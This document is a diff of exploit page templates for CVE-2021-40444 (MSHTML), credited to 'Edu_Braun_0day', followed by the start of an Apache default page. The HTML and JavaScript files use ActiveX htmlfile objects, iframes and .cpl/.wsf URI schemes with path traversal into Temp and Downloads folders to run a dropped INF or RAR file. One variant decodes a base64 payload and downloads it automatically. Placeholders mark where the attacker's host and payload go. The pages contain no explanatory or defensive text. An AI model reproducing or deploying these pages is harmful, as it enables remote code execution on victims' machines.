// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
|
||||
|
||||
var obj = document.createElement("object"); |
||||
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'); |
||||
var i = document.createElement("iframe"); |
||||
document.documentElement.appendChild(i); |
||||
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; |
||||
|
||||
i = document.createElement("iframe"); |
||||
document.documentElement.appendChild(i); |
||||
i.src = "<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
|
||||
</script> |
||||
|
||||
</body> |
||||
</html> |
File diff suppressed because one or more lines are too long
@ -0,0 +1,68 @@ |
||||
<!DOCTYPE html> |
||||
<html lang="en"> |
||||
<head> |
||||
<meta charset="UTF-8"> |
||||
<title>CVE-2021-40444 (Cab-less)</title> |
||||
</head> |
||||
<body> |
||||
<!--Cab-less exploitation by Edu_Braun_0day--> |
||||
|
||||
<script> |
||||
new ActiveXObject('htmlfile').Script.location = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf'; |
||||
|
||||
var i = document.createElement("iframe"); |
||||
document.documentElement.appendChild(i); |
||||
i.src = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf'; |
||||
|
||||
|
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
|
||||
</script> |
||||
</body> |
||||
</html> |
@ -0,0 +1,109 @@ |
||||
<!DOCTYPE html> |
||||
<html lang="en"> |
||||
<head> |
||||
<meta charset="UTF-8"> |
||||
<title>CVE-2021-40444 (Cab-less)</title> |
||||
</head> |
||||
<body> |
||||
<script> |
||||
function base64ToArrayBuffer(base64) { |
||||
const binary_string = window.atob(base64); |
||||
const len = binary_string.length; |
||||
var bytes = new Uint8Array(len); |
||||
for (let i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i);} |
||||
return bytes.buffer; |
||||
} |
||||
|
||||
function isIE() { |
||||
ua = navigator.userAgent; |
||||
return ua.indexOf("MSIE ") > -1 || ua.indexOf("Trident/") > -1; |
||||
} |
||||
|
||||
function save() |
||||
{ |
||||
var file = '<BASE64_DATA_HERE>'; |
||||
|
||||
var data = base64ToArrayBuffer(file); |
||||
var blob = new Blob([data], {type: '<MIME_TYPE_HERE>'}); |
||||
|
||||
var fileName = '<INF_CHANGE_HERE>'; |
||||
|
||||
if (isIE()) { |
||||
navigator.msSaveBlob(blob, fileName); |
||||
} else { |
||||
var a = document.createElement('a'); |
||||
document.body.appendChild(a); |
||||
a.style = 'display: none'; |
||||
var url = window.URL.createObjectURL(blob); |
||||
a.href = url; |
||||
a.download = fileName; |
||||
a.click(); |
||||
window.URL.revokeObjectURL(url); |
||||
} |
||||
} |
||||
|
||||
</script> |
||||
<script> |
||||
function process(){ |
||||
new ActiveXObject('htmlfile').Script.location = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||
|
||||
var i = document.createElement("iframe"); |
||||
document.documentElement.appendChild(i); |
||||
i.src = '<URI_SCHEME_HERE>:../../../Downloads/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||
} |
||||
|
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
|
||||
</script> |
||||
<script> |
||||
save(); |
||||
process(); |
||||
</script> |
||||
</body> |
||||
</html> |
@ -0,0 +1,376 @@ |
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> |
||||
<html xmlns="http://www.w3.org/1999/xhtml"> |
||||
<!-- |
||||
Modified from the Debian original for Ubuntu |
||||
Last updated: 2016-11-16 |
||||
See: https://launchpad.net/bugs/1288690 |
||||
--> |
||||
<head> |
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> |
||||
<title>Apache2 Ubuntu Default Page: It works</title> |
||||
<style type="text/css" media="screen"> |
||||
* { |
||||
margin: 0px 0px 0px 0px; |
||||
padding: 0px 0px 0px 0px; |
||||
} |
||||
|
||||
body, html { |
||||
padding: 3px 3px 3px 3px; |
||||
|
||||
background-color: #D8DBE2; |
||||
|
||||
font-family: Verdana, sans-serif; |
||||
font-size: 11pt; |
||||
text-align: center; |
||||
} |
||||
|
||||
div.main_page { |
||||
position: relative; |
||||
display: table; |
||||
|
||||
width: 800px; |
||||
|
||||
margin-bottom: 3px; |
||||
margin-left: auto; |
||||
margin-right: auto; |
||||
padding: 0px 0px 0px 0px; |
||||
|
||||
border-width: 2px; |
||||
border-color: #212738; |
||||
border-style: solid; |
||||
|
||||
background-color: #FFFFFF; |
||||
|
||||
text-align: center; |
||||
} |
||||
|
||||
div.page_header { |
||||
height: 99px; |
||||
width: 100%; |
||||
|
||||
background-color: #F5F6F7; |
||||
} |
||||
|
||||
div.page_header span { |
||||
margin: 15px 0px 0px 50px; |
||||
|
||||
font-size: 180%; |
||||
font-weight: bold; |
||||
} |
||||
|
||||
div.page_header img { |
||||
margin: 3px 0px 0px 40px; |
||||
|
||||
border: 0px 0px 0px; |
||||
} |
||||
|
||||
div.table_of_contents { |
||||
clear: left; |
||||
|
||||
min-width: 200px; |
||||
|
||||
margin: 3px 3px 3px 3px; |
||||
|
||||
background-color: #FFFFFF; |
||||
|
||||
text-align: left; |
||||
} |
||||
|
||||
div.table_of_contents_item { |
||||
clear: left; |
||||
|
||||
width: 100%; |
||||
|
||||
margin: 4px 0px 0px 0px; |
||||
|
||||
background-color: #FFFFFF; |
||||
|
||||
color: #000000; |
||||
text-align: left; |
||||
} |
||||
|
||||
div.table_of_contents_item a { |
||||
margin: 6px 0px 0px 6px; |
||||
} |
||||
|
||||
div.content_section { |
||||
margin: 3px 3px 3px 3px; |
||||
|
||||
background-color: #FFFFFF; |
||||
|
||||
text-align: left; |
||||
} |
||||
|
||||
div.content_section_text { |
||||
padding: 4px 8px 4px 8px; |
||||
|
||||
color: #000000; |
||||
font-size: 100%; |
||||
} |
||||
|
||||
div.content_section_text pre { |
||||
margin: 8px 0px 8px 0px; |
||||
padding: 8px 8px 8px 8px; |
||||
|
||||
border-width: 1px; |
||||
border-style: dotted; |
||||
border-color: #000000; |
||||
|
||||
background-color: #F5F6F7; |
||||
|
||||
font-style: italic; |
||||
} |
||||
|
||||
div.content_section_text p { |
||||
margin-bottom: 6px; |
||||
} |
||||
|
||||
div.content_section_text ul, div.content_section_text li { |
||||
padding: 4px 8px 4px 16px; |
||||
} |
||||
|
||||
div.section_header { |
||||
padding: 3px 6px 3px 6px; |
||||
|
||||
background-color: #8E9CB2; |
||||
|
||||
color: #FFFFFF; |
||||
font-weight: bold; |
||||
font-size: 112%; |
||||
text-align: center; |
||||
} |
||||
|
||||
div.section_header_red { |
||||
background-color: #CD214F; |
||||
} |
||||
|
||||
div.section_header_grey { |
||||
background-color: #9F9386; |
||||
} |
||||
|
||||
.floating_element { |
||||
position: relative; |
||||
float: left; |
||||
} |
||||
|
||||
div.table_of_contents_item a, |
||||
div.content_section_text a { |
||||
text-decoration: none; |
||||
font-weight: bold; |
||||
} |
||||
|
||||
div.table_of_contents_item a:link, |
||||
div.table_of_contents_item a:visited, |
||||
div.table_of_contents_item a:active { |
||||
color: #000000; |
||||
} |
||||
|
||||
div.table_of_contents_item a:hover { |
||||
background-color: #000000; |
||||
|
||||
color: #FFFFFF; |
||||
} |
||||
|
||||
div.content_section_text a:link, |
||||
div.content_section_text a:visited, |
||||
div.content_section_text a:active { |
||||
background-color: #DCDFE6; |
||||
|
||||
color: #000000; |
||||
} |
||||
|
||||
